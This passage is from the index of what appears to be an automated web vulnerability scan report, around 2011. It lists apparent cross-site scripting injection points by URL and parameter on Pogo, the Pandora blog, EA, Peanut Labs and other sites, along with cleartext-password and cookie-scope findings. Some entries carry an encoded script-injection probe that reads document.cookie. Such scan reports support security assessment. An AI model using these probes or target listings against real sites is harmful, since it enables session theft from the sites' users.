3.315. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 3]
3.316. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 4]
3.317. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 5]
3.318. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 1]
3.319. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 2]
3.320. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 3]
3.321. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 4]
3.322. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 5]
3.323. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 1]
3.324. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 2]
3.325. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 3]
3.326. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 1]
3.327. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 2]
3.328. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 3]
3.329. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 1]
3.330. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 2]
3.331. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 3]
3.332. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 1]
3.333. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 2]
3.334. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 3]
3.335. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 1]
3.336. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 2]
3.337. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 3]
3.338. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 1]
3.339. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 2]
3.340. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 3]
3.341. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 1]
3.342. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 2]
3.343. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 3]
3.344. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 4]
3.345. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 1]
3.346. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 2]
3.347. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 3]
3.348. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 1]
3.349. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 2]
3.350. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 3]
3.351. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 1]
3.352. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 2]
3.353. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 3]
3.354. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 1]
3.355. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 2]
3.356. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 3]
3.357. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 1]
3.358. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 2]
3.359. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 3]
3.360. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 1]
3.361. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 2]
3.362. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 3]
3.363. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 1]
3.364. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 2]
3.365. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 3]
3.366. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 1]
3.367. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 2]
3.368. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 3]
3.369. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 1]
3.370. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 2]
3.371. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 3]
3.372. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 1]
3.373. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 2]
3.374. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 3]
3.375. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 1]
3.376. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 2]
3.377. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 3]
3.378. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 1]
3.379. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 2]
3.380. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 3]
3.381. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 1]
3.382. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 2]
3.383. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 3]
3.384. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 1]
3.385. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 2]
3.386. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 3]
3.387. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 1]
3.388. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 2]
3.389. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 3]
3.390. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 1]
3.391. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 2]
3.392. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 3]
3.393. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 1]
3.394. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 2]
3.395. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 3]
3.396. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 1]
3.397. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 2]
3.398. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 3]
3.399. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 4]
3.400. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 1]
3.401. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 2]
3.402. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 3]
3.403. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 1]
3.404. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 2]
3.405. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 3]
3.406. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 1]
3.407. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 2]
3.408. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 3]
3.409. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 1]
3.410. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 2]
3.411. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 3]
3.412. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 1]
3.413. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 2]
3.414. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 3]
3.415. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 4]
3.416. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 1]
3.417. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 2]
3.418. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 3]
3.419. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 1]
3.420. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 2]
3.421. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 3]
3.422. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 1]
3.423. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 2]
3.424. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 3]
3.425. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 1]
3.426. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 2]
3.427. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 3]
3.428. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 1]
3.429. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 2]
3.430. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 3]
3.431. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 1]
3.432. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 2]
3.433. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 3]
3.434. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 1]
3.435. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 2]
3.436. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 3]
3.437. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 1]
3.438. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 2]
3.439. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 3]
3.440. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 4]
3.441. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 5]
3.443. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 1]
3.444. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 2]
3.445. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 3]
3.446. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 4]
3.447. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 5]
3.449. http://blog.pandora.com/pandora/index.xml [REST URL parameter 1]
3.450. http://blog.pandora.com/pandora/index.xml [REST URL parameter 2]
3.451. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 1]
3.452. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 2]
3.453. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 1]
3.454. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 2]
3.455. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 1]
3.456. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 2]
3.457. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 1]
3.458. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 2]
3.459. http://blog.pandora.com/press [REST URL parameter 1]
3.460. http://blog.pandora.com/show [REST URL parameter 1]
3.461. http://blog.pandora.com/show/ [REST URL parameter 1]
3.464. http://board-games.pogo.com/games/risk [name of an arbitrarily supplied request parameter]
3.465. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]
3.467. http://click.linksynergy.com/fs-bin/stat [offerid parameter]
3.468. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
3.469. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
3.470. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]
3.472. http://download-games.pogo.com/ [refid parameter]
3.473. http://download-games.pogo.com/ [refid parameter]
3.474. http://download-games.pogo.com/ [refid parameter]
3.475. http://download-games.pogo.com/ [refid parameter]
3.476. http://download-games.pogo.com/AllGames.aspx [SortBy parameter]
3.477. http://download-games.pogo.com/AllGames.aspx [sDir parameter]
3.478. http://download-games.pogo.com/Category.aspx [RefID parameter]
3.479. http://download-games.pogo.com/Category.aspx [RefID parameter]
3.480. http://download-games.pogo.com/Category.aspx [refId parameter]
3.481. http://download-games.pogo.com/Category.aspx [refId parameter]
3.482. http://download-games.pogo.com/deluxe.aspx [RefID parameter]
3.483. http://download-games.pogo.com/deluxe.aspx [RefID parameter]
3.484. http://download-games.pogo.com/deluxe.aspx [RefID parameter]
3.485. http://download-games.pogo.com/deluxe.aspx [RefID parameter]
3.486. http://download-games.pogo.com/deluxe.aspx [origin parameter]
3.487. http://download-games.pogo.com/deluxe.aspx [refid parameter]
3.488. http://download-games.pogo.com/deluxe.aspx [refid parameter]
3.489. http://download-games.pogo.com/deluxe.aspx [refid parameter]
3.490. http://download-games.pogo.com/downloads.aspx [refid parameter]
3.491. http://event.adxpose.com/event.flow [uid parameter]
3.492. http://flash-games.pogo.com/ [name of an arbitrarily supplied request parameter]
3.494. http://game3.pogo.com/room/loading/init.jsp [ahst parameter]
3.495. http://game3.pogo.com/room/loading/init.jsp [anam parameter]
3.496. http://game3.pogo.com/room/loading/init.jsp [apid parameter]
3.497. http://game3.pogo.com/room/loading/init.jsp [auto parameter]
3.500. http://game3.pogo.com/room/loading/init.jsp [rhst parameter]
3.501. http://game3.pogo.com/room/loading/init.jsp [rspt parameter]
3.502. http://game3.pogo.com/room/loading/init.jsp [scrn parameter]
3.503. http://game3.pogo.com/room/loading/init.jsp [ugifts parameter]
3.504. http://game3.pogo.com/room/loading/jvmtest.jsp [ahst parameter]
3.505. http://game3.pogo.com/room/loading/jvmtest.jsp [anam parameter]
3.506. http://game3.pogo.com/room/loading/jvmtest.jsp [apid parameter]
3.507. http://game3.pogo.com/room/loading/jvmtest.jsp [auto parameter]
3.509. http://game3.pogo.com/room/loading/jvmtest.jsp [rhst parameter]
3.510. http://game3.pogo.com/room/loading/jvmtest.jsp [rspt parameter]
3.511. http://game3.pogo.com/room/loading/jvmtest.jsp [scrn parameter]
3.512. http://game3.pogo.com/room/loading/jvmtest.jsp [ugifts parameter]
3.513. http://game3.pogo.com/room/loading/loading.jsp [ahst parameter]
3.514. http://game3.pogo.com/room/loading/loading.jsp [ahst parameter]
3.515. http://game3.pogo.com/room/loading/loading.jsp [ctim parameter]
3.518. http://jqueryui.com/themeroller/ [bgColorActive parameter]
3.519. http://jqueryui.com/themeroller/ [bgColorContent parameter]
3.520. http://jqueryui.com/themeroller/ [bgColorDefault parameter]
3.521. http://jqueryui.com/themeroller/ [bgColorHeader parameter]
3.522. http://jqueryui.com/themeroller/ [bgColorHover parameter]
3.523. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]
3.524. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]
3.525. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]
3.526. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]
3.527. http://jqueryui.com/themeroller/ [bgTextureActive parameter]
3.528. http://jqueryui.com/themeroller/ [bgTextureContent parameter]
3.529. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]
3.530. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]
3.531. http://jqueryui.com/themeroller/ [bgTextureHover parameter]
3.532. http://jqueryui.com/themeroller/ [borderColorContent parameter]
3.533. http://jqueryui.com/themeroller/ [borderColorDefault parameter]
3.534. http://jqueryui.com/themeroller/ [borderColorHeader parameter]
3.535. http://jqueryui.com/themeroller/ [borderColorHover parameter]
3.536. http://jqueryui.com/themeroller/ [cornerRadius parameter]
3.537. http://jqueryui.com/themeroller/ [fcContent parameter]
3.538. http://jqueryui.com/themeroller/ [fcDefault parameter]
3.539. http://jqueryui.com/themeroller/ [fcHeader parameter]
3.540. http://jqueryui.com/themeroller/ [fcHover parameter]
3.541. http://jqueryui.com/themeroller/ [ffDefault parameter]
3.542. http://jqueryui.com/themeroller/ [fsDefault parameter]
3.543. http://jqueryui.com/themeroller/ [fwDefault parameter]
3.544. http://jqueryui.com/themeroller/ [iconColorContent parameter]
3.545. http://jqueryui.com/themeroller/ [iconColorDefault parameter]
3.546. http://jqueryui.com/themeroller/ [iconColorHeader parameter]
3.547. http://jqueryui.com/themeroller/ [iconColorHover parameter]
3.548. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
3.550. http://r.turn.com/server/pixel.htm [fpid parameter]
3.551. http://r.turn.com/server/pixel.htm [sp parameter]
3.552. http://revver.com/video/426755/peanut-labs/ [REST URL parameter 3]
3.553. http://themeforest.net/user/freshface/portfolio [REST URL parameter 1]
3.554. http://themeforest.net/user/freshface/portfolio [REST URL parameter 2]
3.555. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter]
3.556. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter]
3.559. http://www.cmsinter.net/ [name of an arbitrarily supplied request parameter]
3.561. http://www.e00.peanutlabs.com/js/iFrame/sc.php [userId parameter]
3.562. http://www.ea.com/hasbro [REST URL parameter 1]
3.563. http://www.ea.com/hasbro [name of an arbitrarily supplied request parameter]
3.564. http://www.ea.com/ipad [REST URL parameter 1]
3.565. http://www.ea.com/ipad [name of an arbitrarily supplied request parameter]
3.566. http://www.ea.com/iphone [REST URL parameter 1]
3.567. http://www.ea.com/iphone [name of an arbitrarily supplied request parameter]
3.568. http://www.ea.com/mobile [REST URL parameter 1]
3.569. http://www.ea.com/mobile [name of an arbitrarily supplied request parameter]
3.570. http://www.ea.com/platform/online-games [REST URL parameter 1]
3.571. http://www.ea.com/platform/online-games [REST URL parameter 2]
3.572. http://www.ea.com/platform/online-games [name of an arbitrarily supplied request parameter]
3.573. http://www.ea.com/platform/pc-games [REST URL parameter 1]
3.574. http://www.ea.com/platform/pc-games [REST URL parameter 2]
3.575. http://www.ea.com/platform/pc-games [name of an arbitrarily supplied request parameter]
3.576. http://www.ea.com/platform/ps3-games [REST URL parameter 1]
3.577. http://www.ea.com/platform/ps3-games [REST URL parameter 2]
3.578. http://www.ea.com/platform/ps3-games [name of an arbitrarily supplied request parameter]
3.579. http://www.ea.com/platform/xbox-360-games [REST URL parameter 1]
3.580. http://www.ea.com/platform/xbox-360-games [REST URL parameter 2]
3.581. http://www.ea.com/platform/xbox-360-games [name of an arbitrarily supplied request parameter]
3.582. http://www.ea.com/wii [REST URL parameter 1]
3.583. http://www.ea.com/wii [name of an arbitrarily supplied request parameter]
3.585. http://www.intellicast.com/ [name of an arbitrarily supplied request parameter]
3.586. http://www.intellicast.com/Local/Weather.aspx [REST URL parameter 2]
3.587. http://www.intellicast.com/Local/Weather.aspx [location parameter]
3.589. http://www.mlive.com/ [name of an arbitrarily supplied request parameter]
3.590. http://www.outofhanwell.com/blog/index.php [REST URL parameter 1]
3.591. http://www.outofhanwell.com/blog/index.php [REST URL parameter 2]
3.592. http://www.pandora.com/people/ [name of an arbitrarily supplied request parameter]
3.593. http://www.peanutlabs.com/core.php [coreClass parameter]
3.594. http://www.peanutlabs.com/core.php [coreClass parameter]
3.595. http://www.peanutlabs.com/core.php [iframe_tag parameter]
3.596. http://www.peanutlabs.com/core.php [rewardAvailable parameter]
3.598. http://www.peanutlabs.com/js/iFrame/sc.php [userId parameter]
3.600. http://www.peanutlabs.com/sampleIframe.php [userId parameter]
3.601. http://www.pogo.com/ [f9258%22%3E%3Cscript%3Ealert(document.cookie parameter]
3.602. http://www.pogo.com/ [name of an arbitrarily supplied request parameter]
3.605. http://www.pogo.com/action/pogo/createAccount.do [pageSection parameter]
3.606. http://www.pogo.com/card-games [pageSection parameter]
3.607. http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter]
3.608. http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter]
3.609. http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter]
3.616. http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter]
3.617. http://www.pogo.com/prize/prize.do [pageSection parameter]
3.618. http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter]
3.620. http://www.slidedeck.com/download [REST URL parameter 1]
3.621. http://www.slidedeck.com/usage-documentation [REST URL parameter 1]
3.622. http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter]
3.623. http://board-games.pogo.com/ [Referer HTTP header]
3.624. http://board-games.pogo.com/games/monopoly [Referer HTTP header]
3.625. http://board-games.pogo.com/games/online-chess [Referer HTTP header]
3.626. http://board-games.pogo.com/games/risk [Referer HTTP header]
3.627. http://card-games.pogo.com/ [Referer HTTP header]
3.628. http://card-games.pogo.com/games/rainy-day-spider-solitaire [Referer HTTP header]
3.629. http://clubpogo-games.pogo.com/ [Referer HTTP header]
3.630. http://flash-games.pogo.com/ [Referer HTTP header]
3.631. http://game3.pogo.com/error/java-problem.jsp [Referer HTTP header]
3.632. http://game3.pogo.com/exhibit/game/game.jsp [Referer HTTP header]
3.633. http://game3.pogo.com/exhibit/intermission.jsp [Referer HTTP header]
3.634. http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header]
3.635. http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header]
3.636. http://game3.pogo.com/room/game/autoplay-table.jsp [Referer HTTP header]
3.637. http://game3.pogo.com/room/game/chatshell.jsp [Referer HTTP header]
3.638. http://game3.pogo.com/room/game/controlshell.jsp [Referer HTTP header]
3.639. http://game3.pogo.com/room/game/dashshell.jsp [Referer HTTP header]
3.640. http://game3.pogo.com/room/game/frameset.jsp [Referer HTTP header]
3.641. http://game3.pogo.com/room/game/game.jsp [Referer HTTP header]
3.642. http://game3.pogo.com/room/game/gameshell.jsp [Referer HTTP header]
3.643. http://game3.pogo.com/room/loading/init.jsp [Referer HTTP header]
3.644. http://game3.pogo.com/room/loading/jvmtest.jsp [Referer HTTP header]
3.645. http://game3.pogo.com/room/loading/jvmtest.jsp [User-Agent HTTP header]
3.646. http://game3.pogo.com/room/loading/loading.jsp [Referer HTTP header]
3.647. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]
3.648. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]
3.649. http://game3.pogo.com/room/util/urlopen.jsp [Referer HTTP header]
3.650. http://game3.pogo.com/util/client-props.jsp [Referer HTTP header]
3.651. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/ [Referer HTTP header]
3.652. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/ [Referer HTTP header]
3.653. http://puzzle-games.pogo.com/ [Referer HTTP header]
3.654. http://puzzle-games.pogo.com/games/bejeweled2 [Referer HTTP header]
3.655. http://rss.pogo.com/rss [Referer HTTP header]
3.656. http://word-games.pogo.com/ [Referer HTTP header]
3.657. http://word-games.pogo.com/games/scrabble [Referer HTTP header]
3.658. http://word-games.pogo.com/games/scrabble [Referer HTTP header]
3.659. http://www.bbc.co.uk/news/technology-12126880 [Referer HTTP header]
3.660. http://www.gamespot.com/ [Referer HTTP header]
3.661. http://www.pogo.com/ [Referer HTTP header]
3.662. http://www.pogo.com/ [Referer HTTP header]
3.663. http://www.pogo.com/account/my-account.do [Referer HTTP header]
3.664. http://www.pogo.com/account/my-account/confirm-recover-password.do [Referer HTTP header]
3.665. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header]
3.666. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header]
3.667. http://www.pogo.com/account/my-account/main.do [Referer HTTP header]
3.668. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header]
3.669. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header]
3.670. http://www.pogo.com/account/verify-password.do [Referer HTTP header]
3.671. http://www.pogo.com/account/verify-password.do [Referer HTTP header]
3.672. http://www.pogo.com/action/pogo/confirmation.do [Referer HTTP header]
3.673. http://www.pogo.com/action/pogo/createAccount.do [Referer HTTP header]
3.674. http://www.pogo.com/action/pogo/lightreg.do [Referer HTTP header]
3.675. http://www.pogo.com/action/pogo/lightregview.do [Referer HTTP header]
3.676. http://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]
3.677. http://www.pogo.com/all-games [Referer HTTP header]
3.678. http://www.pogo.com/board-games [Referer HTTP header]
3.679. http://www.pogo.com/board-games [Referer HTTP header]
3.680. http://www.pogo.com/games/connect.jsp [Referer HTTP header]
3.681. http://www.pogo.com/home/home.jsp [Referer HTTP header]
3.682. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [Referer HTTP header]
3.686. http://www.pogo.com/img/prize/en_US/cash-giveaway [Referer HTTP header]
3.687. http://www.pogo.com/login/entry.jsp [Referer HTTP header]
3.688. http://www.pogo.com/login/pogo/setCookie.do [Referer HTTP header]
3.689. http://www.pogo.com/login/word-verification.jsp [Referer HTTP header]
3.690. http://www.pogo.com/news/us/latestnews/news-2010.jsp [Referer HTTP header]
3.691. http://www.pogo.com/news/us/netiquette/net-2009.jsp [Referer HTTP header]
3.692. http://www.pogo.com/news/us/winnerscircle/winners-2010.jsp [Referer HTTP header]
3.693. http://www.pogo.com/prize/prize.do [Referer HTTP header]
3.694. http://www.pogo.com/prize/prize.do [Referer HTTP header]
3.695. http://www.pogo.com/prize/rules.do [Referer HTTP header]
3.696. http://www.pogo.com/profiles/k7240 [Referer HTTP header]
3.697. http://www.pogo.com/puzzle-games [Referer HTTP header]
3.698. http://www.pogo.com/puzzle-games [Referer HTTP header]
3.699. http://www.pogo.com/sitemap [Referer HTTP header]
3.700. http://www.pogo.com/word-games [Referer HTTP header]
3.701. http://www.pogo.com/word-games [Referer HTTP header]
3.702. https://www.pogo.com/action/pogo/signin.do [Referer HTTP header]
3.703. https://www.pogo.com/action/pogop/heavyregview.do [Referer HTTP header]
3.704. https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]
3.705. https://www.pogo.com/surveys/processZipSubs.do [Referer HTTP header]
3.706. https://www.pogo.com/surveys/surveysofferssubs.do [Referer HTTP header]
3.707. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]
3.708. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]
3.709. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie]
3.710. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie]
3.711. http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie]
3.712. http://www.peanutlabs.com/userGreeting.php [pl_lang cookie]
5. Cleartext submission of password
5.1. http://activity.livefaceonweb.com/
5.2. http://diythemes.com/thesis/
5.3. http://mail.cmsinter.net/Login.aspx
5.4. http://malsup.com/jquery/form/
5.5. http://malsup.com/jquery/form/
5.6. http://malsup.com/jquery/form/
5.7. http://malsup.com/jquery/form/
5.8. http://malsup.com/jquery/form/
5.9. http://malsup.com/jquery/form/
5.10. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
5.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
5.12. http://revver.com/video/426755/peanut-labs/
5.13. http://themeforest.net/user/freshface/portfolio
5.14. http://wordpress.org/extend/plugins/wp-pagenavi/
5.15. http://www.43things.com/person/
5.16. http://www.facebook.com/
5.19. http://www.peanutlabs.com/adminLogin.php
5.21. http://www.pogo.com/account/verify-password.do
5.22. http://www.pogo.com/action/pogo/lightregview.do
5.23. http://www.rockband.com/
6.1. http://www.facebook.com/extern/login_status.php
6.2. http://www.pogo.com/account/my-account/main.do
6.3. http://www.slidedeck.com/
7. Password field submitted using GET method
8. ASP.NET ViewState without MAC enabled
8.1. http://beta-ads.ace.advertising.com/
8.2. http://r1.ace.advertising.com/
9. Cookie scoped to parent domain
9.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
9.2. http://www.43things.com/person/
9.3. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
9.4. http://www.peanutlabs.com/peanutlabs/
9.5. http://www.peanutlabs.com/userGreeting.php
9.6. http://ad.doubleclick.net/click
9.7. http://ad.turn.com/server/pixel.htm
9.8. http://admeld.adnxs.com/usersync
9.9. http://ads.adxpose.com/ads/ads.js
9.10. http://altfarm.mediaplex.com/ad/js/55290
9.11. http://b.scorecardresearch.com/b
9.12. http://b.scorecardresearch.com/p
9.13. http://b.scorecardresearch.com/r
9.14. http://board-games.pogo.com/
9.15. http://board-games.pogo.com/games/monopoly
9.16. http://board-games.pogo.com/games/online-chess
9.17. http://board-games.pogo.com/games/risk
9.18. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
9.19. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
9.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs
9.21. http://card-games.pogo.com/
9.22. http://card-games.pogo.com/games/cribbage
9.23. http://card-games.pogo.com/games/rainy-day-spider-solitaire
9.24. http://click.linksynergy.com/fs-bin/stat
9.25. http://clubpogo-games.pogo.com/
9.26. http://flash-games.pogo.com/
9.27. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
9.28. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
9.29. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js
9.30. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
9.31. http://puzzle-games.pogo.com/
9.32. http://puzzle-games.pogo.com/games/bejeweled2
9.33. http://puzzle-games.pogo.com/games/yahtzee-party
9.34. http://r.turn.com/server/pixel.htm
9.40. http://www.adobe.com/cfusion/exchange/
